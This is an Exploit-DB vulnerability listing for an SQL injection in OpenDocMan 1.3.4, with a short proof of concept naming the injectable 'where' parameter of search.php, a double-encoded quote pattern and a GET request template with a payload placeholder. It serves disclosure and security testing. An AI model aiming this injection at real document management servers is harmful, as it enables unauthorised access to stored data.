OpenDocMan 1.3.4 - 'search.php where' SQL Injection

EDB-ID:

46500

CVE:

N/A




Platform:

PHP

Date:

2019-03-05


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

===========================================================================================
# Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection
# CVE: N/A
# Date: 05/03/2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/opendocman/files/
# Software Link: https://sourceforge.net/projects/opendocman/files/
# Version: v1.3.4
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description: OpenDocMan is a web based document management
system (DMS) written in PHP designed
  to comply with ISO 17025 and OIE standard for document management.
  It features fine grained control of access to files, and automated
install and upgrades.
===========================================================================================
# POC - SQLi
# Parameters : where
# Attack Pattern : %2527
# GET Request :
http://localhost/opendocman/search.php?submit=submit&sort_by=id&where=[SQL Inject Here]&sort_order=asc&keyword=Training Manual&exact_phrase=on
===========================================================================================